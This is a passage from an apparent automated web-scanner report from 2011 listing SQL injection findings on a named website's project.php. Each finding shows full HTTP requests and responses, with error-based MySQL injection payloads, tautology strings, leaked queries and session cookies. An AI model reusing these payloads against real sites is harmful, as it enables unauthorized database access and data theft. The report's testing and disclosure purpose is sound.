User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'/'
   unio' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3'' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
1.12. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3&1'=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:18:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
oject_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3&1'=1' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3&1''=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:18:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
1.13. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow'/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow''/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
1.14. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00'/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00''/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
1.15. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php'?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php''?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
1.16. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002'&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002'&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002''&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
1.17. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
